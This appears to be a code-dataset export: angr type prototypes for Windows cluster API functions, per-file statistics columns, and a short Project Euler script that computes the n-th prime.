'ClusterNetInterfaceControl': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNETINTERFACE", pack=False, align=None), offset=0), SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hNetInterface", "hHostNode", "dwControlCode", "lpInBuffer", "nInBufferSize", "lpOutBuffer", "nOutBufferSize", "lpBytesReturned"]),
#
'GetClusterKey': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["hCluster", "samDesired"]),
#
'GetClusterGroupKey': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["hGroup", "samDesired"]),
#
'GetClusterResourceKey': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HRESOURCE", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["hResource", "samDesired"]),
#
'GetClusterNodeKey': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["hNode", "samDesired"]),
#
'GetClusterNetworkKey': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNETWORK", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["hNetwork", "samDesired"]),
#
'GetClusterNetInterfaceKey': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNETINTERFACE", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["hNetInterface", "samDesired"]),
#
'ClusterRegCreateKey': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"nLength": SimTypeInt(signed=False, label="UInt32"), "lpSecurityDescriptor": SimTypePointer(SimTypeBottom(label="Void"), offset=0), "bInheritHandle": SimTypeInt(signed=True, label="Int32")}, name="SECURITY_ATTRIBUTES", pack=False, align=None), offset=0), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hKey", "lpszSubKey", "dwOptions", "samDesired", "lpSecurityAttributes", "phkResult", "lpdwDisposition"]),
#
'ClusterRegOpenKey': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hKey", "lpszSubKey", "samDesired", "phkResult"]),
#
'ClusterRegDeleteKey': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hKey", "lpszSubKey"]),
#
'ClusterRegCloseKey': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hKey"]),
#
'ClusterRegEnumKey': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimStruct({"dwLowDateTime": SimTypeInt(signed=False, label="UInt32"), "dwHighDateTime": SimTypeInt(signed=False, label="UInt32")}, name="FILETIME", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hKey", "dwIndex", "lpszName", "lpcchName", "lpftLastWriteTime"]),
#
'ClusterRegSetValue': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hKey", "lpszValueName", "dwType", "lpData", "cbData"]),
#
'ClusterRegDeleteValue': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hKey", "lpszValueName"]),
#
'ClusterRegQueryValue': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hKey", "lpszValueName", "lpdwValueType", "lpData", "lpcbData"]),
#
'ClusterRegEnumValue': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hKey", "dwIndex", "lpszValueName", "lpcchValueName", "lpdwType", "lpData", "lpcbData"]),
#
'ClusterRegQueryInfoKey': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimStruct({"dwLowDateTime": SimTypeInt(signed=False, label="UInt32"), "dwHighDateTime": SimTypeInt(signed=False, label="UInt32")}, name="FILETIME", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hKey", "lpcSubKeys", "lpcchMaxSubKeyLen", "lpcValues", "lpcchMaxValueNameLen", "lpcbMaxValueLen", "lpcbSecurityDescriptor", "lpftLastWriteTime"]),
#
'ClusterRegGetKeySecurity': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"Revision": SimTypeChar(label="Byte"), "Sbz1": SimTypeChar(label="Byte"), "Control": SimTypeShort(signed=False, label="UInt16"), "Owner": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), "Group": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), "Sacl": SimTypePointer(SimStruct({"AclRevision": SimTypeChar(label="Byte"), "Sbz1": SimTypeChar(label="Byte"), "AclSize": SimTypeShort(signed=False, label="UInt16"), "AceCount": SimTypeShort(signed=False, label="UInt16"), "Sbz2": SimTypeShort(signed=False, label="UInt16")}, name="ACL", pack=False, align=None), offset=0), "Dacl": SimTypePointer(SimStruct({"AclRevision": SimTypeChar(label="Byte"), "Sbz1": SimTypeChar(label="Byte"), "AclSize": SimTypeShort(signed=False, label="UInt16"), "AceCount": SimTypeShort(signed=False, label="UInt16"), "Sbz2": SimTypeShort(signed=False, label="UInt16")}, name="ACL", pack=False, align=None), offset=0)}, name="SECURITY_DESCRIPTOR", pack=False, align=None), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hKey", "RequestedInformation", "pSecurityDescriptor", "lpcbSecurityDescriptor"]),
#
'ClusterRegSetKeySecurity': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"Revision": SimTypeChar(label="Byte"), "Sbz1": SimTypeChar(label="Byte"), "Control": SimTypeShort(signed=False, label="UInt16"), "Owner": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), "Group": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), "Sacl": SimTypePointer(SimStruct({"AclRevision": SimTypeChar(label="Byte"), "Sbz1": SimTypeChar(label="Byte"), "AclSize": SimTypeShort(signed=False, label="UInt16"), "AceCount": SimTypeShort(signed=False, label="UInt16"), "Sbz2": SimTypeShort(signed=False, label="UInt16")}, name="ACL", pack=False, align=None), offset=0), "Dacl": SimTypePointer(SimStruct({"AclRevision": SimTypeChar(label="Byte"), "Sbz1": SimTypeChar(label="Byte"), "AclSize": SimTypeShort(signed=False, label="UInt16"), "AceCount": SimTypeShort(signed=False, label="UInt16"), "Sbz2": SimTypeShort(signed=False, label="UInt16")}, name="ACL", pack=False, align=None), offset=0)}, name="SECURITY_DESCRIPTOR", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hKey", "SecurityInformation", "pSecurityDescriptor"]),
#
'ClusterRegSyncDatabase': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["hCluster", "flags"]),
#
'ClusterRegCreateBatch': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypePointer(SimStruct({}, name="_HREGBATCH", pack=False, align=None), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hKey", "pHREGBATCH"]),
#
'ClusterRegBatchAddCommand': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HREGBATCH", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="CLUSTER_REG_COMMAND"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["hRegBatch", "dwCommand", "wzName", "dwOptions", "lpData", "cbData"]),
#
'ClusterRegCloseBatch': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HREGBATCH", pack=False, align=None), offset=0), SimTypeInt(signed=True, label="Int32"), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hRegBatch", "bCommit", "failedCommandNumber"]),
#
'ClusterRegCloseBatchEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HREGBATCH", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hRegBatch", "flags", "failedCommandNumber"]),
#
'ClusterRegBatchReadCommand': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HREGBATCHNOTIFICATION", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"Command": SimTypeInt(signed=False, label="CLUSTER_REG_COMMAND"), "dwOptions": SimTypeInt(signed=False, label="UInt32"), "wzName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpData": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "cbData": SimTypeInt(signed=False, label="UInt32")}, name="CLUSTER_BATCH_COMMAND", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hBatchNotification", "pBatchCommand"]),
#
'ClusterRegBatchCloseNotification': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HREGBATCHNOTIFICATION", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hBatchNotification"]),
#
'ClusterRegCreateBatchNotifyPort': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypePointer(SimStruct({}, name="_HREGBATCHPORT", pack=False, align=None), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hKey", "phBatchNotifyPort"]),
#
'ClusterRegCloseBatchNotifyPort': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HREGBATCHPORT", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hBatchNotifyPort"]),
#
'ClusterRegGetBatchNotification': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HREGBATCHPORT", pack=False, align=None), offset=0), SimTypePointer(SimTypePointer(SimStruct({}, name="_HREGBATCHNOTIFICATION", pack=False, align=None), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hBatchNotify", "phBatchNotification"]),
#
'ClusterRegCreateReadBatch': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypePointer(SimStruct({}, name="_HREGREADBATCH", pack=False, align=None), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hKey", "phRegReadBatch"]),
#
'ClusterRegReadBatchAddCommand': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HREGREADBATCH", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hRegReadBatch", "wzSubkeyName", "wzValueName"]),
#
'ClusterRegCloseReadBatch': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HREGREADBATCH", pack=False, align=None), offset=0), SimTypePointer(SimTypePointer(SimStruct({}, name="_HREGREADBATCHREPLY", pack=False, align=None), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hRegReadBatch", "phRegReadBatchReply"]),
#
'ClusterRegCloseReadBatchEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HREGREADBATCH", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypePointer(SimStruct({}, name="_HREGREADBATCHREPLY", pack=False, align=None), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hRegReadBatch", "flags", "phRegReadBatchReply"]),
#
'ClusterRegReadBatchReplyNextCommand': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HREGREADBATCHREPLY", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"Command": SimTypeInt(signed=False, label="CLUSTER_REG_COMMAND"), "dwOptions": SimTypeInt(signed=False, label="UInt32"), "wzSubkeyName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "wzValueName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpData": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "cbData": SimTypeInt(signed=False, label="UInt32")}, name="CLUSTER_READ_BATCH_COMMAND", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hRegReadBatchReply", "pBatchCommand"]),
#
'ClusterRegCloseReadBatchReply': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HREGREADBATCHREPLY", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hRegReadBatchReply"]),
#
'ClusterSetAccountAccess': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "szAccountSID", "dwAccess", "dwControlType"]),
#
'CreateCluster': SimTypeFunction([SimTypePointer(SimStruct({"dwVersion": SimTypeInt(signed=False, label="UInt32"), "lpszClusterName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "cNodes": SimTypeInt(signed=False, label="UInt32"), "ppszNodeNames": SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0), "cIpEntries": SimTypeInt(signed=False, label="UInt32"), "pIpEntries": SimTypePointer(SimStruct({"lpszIpAddress": SimTypePointer(SimTypeChar(label="Char"), offset=0), "dwPrefixLength": SimTypeInt(signed=False, label="UInt32")}, name="CLUSTER_IP_ENTRY", pack=False, align=None), offset=0), "fEmptyCluster": SimTypeChar(label="Byte"), "managementPointType": SimTypeInt(signed=False, label="CLUSTER_MGMT_POINT_TYPE"), "managementPointResType": SimTypeInt(signed=False, label="CLUSTER_MGMT_POINT_RESTYPE")}, name="CREATE_CLUSTER_CONFIG", pack=False, align=None), offset=0), SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="CLUSTER_SETUP_PHASE"), SimTypeInt(signed=False, label="CLUSTER_SETUP_PHASE_TYPE"), SimTypeInt(signed=False, label="CLUSTER_SETUP_PHASE_SEVERITY"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["pvCallbackArg", "eSetupPhase", "ePhaseType", "ePhaseSeverity", "dwPercentComplete", "lpszObjectName", "dwStatus"]), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), arg_names=["pConfig", "pfnProgressCallback", "pvCallbackArg"]),
#
'CreateClusterNameAccount': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"dwVersion": SimTypeInt(signed=False, label="UInt32"), "lpszClusterName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "dwFlags": SimTypeInt(signed=False, label="UInt32"), "pszUserName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "pszPassword": SimTypePointer(SimTypeChar(label="Char"), offset=0), "pszDomain": SimTypePointer(SimTypeChar(label="Char"), offset=0), "managementPointType": SimTypeInt(signed=False, label="CLUSTER_MGMT_POINT_TYPE"), "managementPointResType": SimTypeInt(signed=False, label="CLUSTER_MGMT_POINT_RESTYPE"), "bUpgradeVCOs": SimTypeChar(label="Byte")}, name="CREATE_CLUSTER_NAME_ACCOUNT", pack=False, align=None), offset=0), SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="CLUSTER_SETUP_PHASE"), SimTypeInt(signed=False, label="CLUSTER_SETUP_PHASE_TYPE"), SimTypeInt(signed=False, label="CLUSTER_SETUP_PHASE_SEVERITY"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["pvCallbackArg", "eSetupPhase", "ePhaseType", "ePhaseSeverity", "dwPercentComplete", "lpszObjectName", "dwStatus"]), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "pConfig", "pfnProgressCallback", "pvCallbackArg"]),
#
'RemoveClusterNameAccount': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "bDeleteComputerObjects"]),
#
'DetermineCNOResTypeFromNodelist': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0), SimTypePointer(SimTypeInt(signed=False, label="CLUSTER_MGMT_POINT_RESTYPE"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["cNodes", "ppszNodeNames", "pCNOResType"]),
#
'DetermineCNOResTypeFromCluster': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeInt(signed=False, label="CLUSTER_MGMT_POINT_RESTYPE"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "pCNOResType"]),
#
'DetermineClusterCloudTypeFromNodelist': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0), SimTypePointer(SimTypeInt(signed=False, label="CLUSTER_CLOUD_TYPE"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["cNodes", "ppszNodeNames", "pCloudType"]),
#
'DetermineClusterCloudTypeFromCluster': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeInt(signed=False, label="CLUSTER_CLOUD_TYPE"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "pCloudType"]),
#
'GetNodeCloudTypeDW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["ppszNodeName", "NodeCloudType"]),
#
'RegisterClusterResourceTypeNotifyV2': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCHANGE", pack=False, align=None), offset=0), SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypeLongLong(signed=True, label="Int64"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hChange", "hCluster", "Flags", "resTypeName", "dwNotifyKey"]),
#
'AddClusterNode': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="CLUSTER_SETUP_PHASE"), SimTypeInt(signed=False, label="CLUSTER_SETUP_PHASE_TYPE"), SimTypeInt(signed=False, label="CLUSTER_SETUP_PHASE_SEVERITY"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["pvCallbackArg", "eSetupPhase", "ePhaseType", "ePhaseSeverity", "dwPercentComplete", "lpszObjectName", "dwStatus"]), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0), arg_names=["hCluster", "lpszNodeName", "pfnProgressCallback", "pvCallbackArg"]),
#
'AddClusterStorageNode': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="CLUSTER_SETUP_PHASE"), SimTypeInt(signed=False, label="CLUSTER_SETUP_PHASE_TYPE"), SimTypeInt(signed=False, label="CLUSTER_SETUP_PHASE_SEVERITY"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["pvCallbackArg", "eSetupPhase", "ePhaseType", "ePhaseSeverity", "dwPercentComplete", "lpszObjectName", "dwStatus"]), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "lpszNodeName", "pfnProgressCallback", "pvCallbackArg", "lpszClusterStorageNodeDescription", "lpszClusterStorageNodeLocation"]),
#
'RemoveClusterStorageNode': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "lpszClusterStorageEnclosureName", "dwTimeout", "dwFlags"]),
#
'DestroyCluster': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="CLUSTER_SETUP_PHASE"), SimTypeInt(signed=False, label="CLUSTER_SETUP_PHASE_TYPE"), SimTypeInt(signed=False, label="CLUSTER_SETUP_PHASE_SEVERITY"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["pvCallbackArg", "eSetupPhase", "ePhaseType", "ePhaseSeverity", "dwPercentComplete", "lpszObjectName", "dwStatus"]), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "pfnProgressCallback", "pvCallbackArg", "fdeleteVirtualComputerObjects"]),
}
lib.set_prototypes(prototypes)
| 200.777542
| 1,697
| 0.727753
| 9,465
| 94,767
| 7.216059
| 0.065082
| 0.064773
| 0.106354
| 0.165974
| 0.850102
| 0.840146
| 0.831801
| 0.820161
| 0.817745
| 0.811493
| 0
| 0.018433
| 0.088617
| 94,767
| 471
| 1,698
| 201.203822
| 0.77236
| 0.000295
| 0
| 0
| 0
| 0
| 0.23665
| 0.055872
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.008368
| 0.020921
| 0
| 0.020921
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
ad6f31fc8b9fda7679e7a7e48d80154446654b0e
| 115
|
py
|
Python
|
problems/0007/compute.py
|
Dynortice/Project-Euler
|
99a0201b5d5f147eab77fc52d9db8995045cded0
|
[
"MIT"
] | null | null | null |
problems/0007/compute.py
|
Dynortice/Project-Euler
|
99a0201b5d5f147eab77fc52d9db8995045cded0
|
[
"MIT"
] | null | null | null |
problems/0007/compute.py
|
Dynortice/Project-Euler
|
99a0201b5d5f147eab77fc52d9db8995045cded0
|
[
"MIT"
] | null | null | null |
from euler.primes import prime_numbers
def compute(n: int) -> int:
return list(prime_numbers(n * 20))[n - 1]
| 19.166667
| 45
| 0.686957
| 19
| 115
| 4.052632
| 0.736842
| 0.311688
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.031915
| 0.182609
| 115
| 5
| 46
| 23
| 0.787234
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.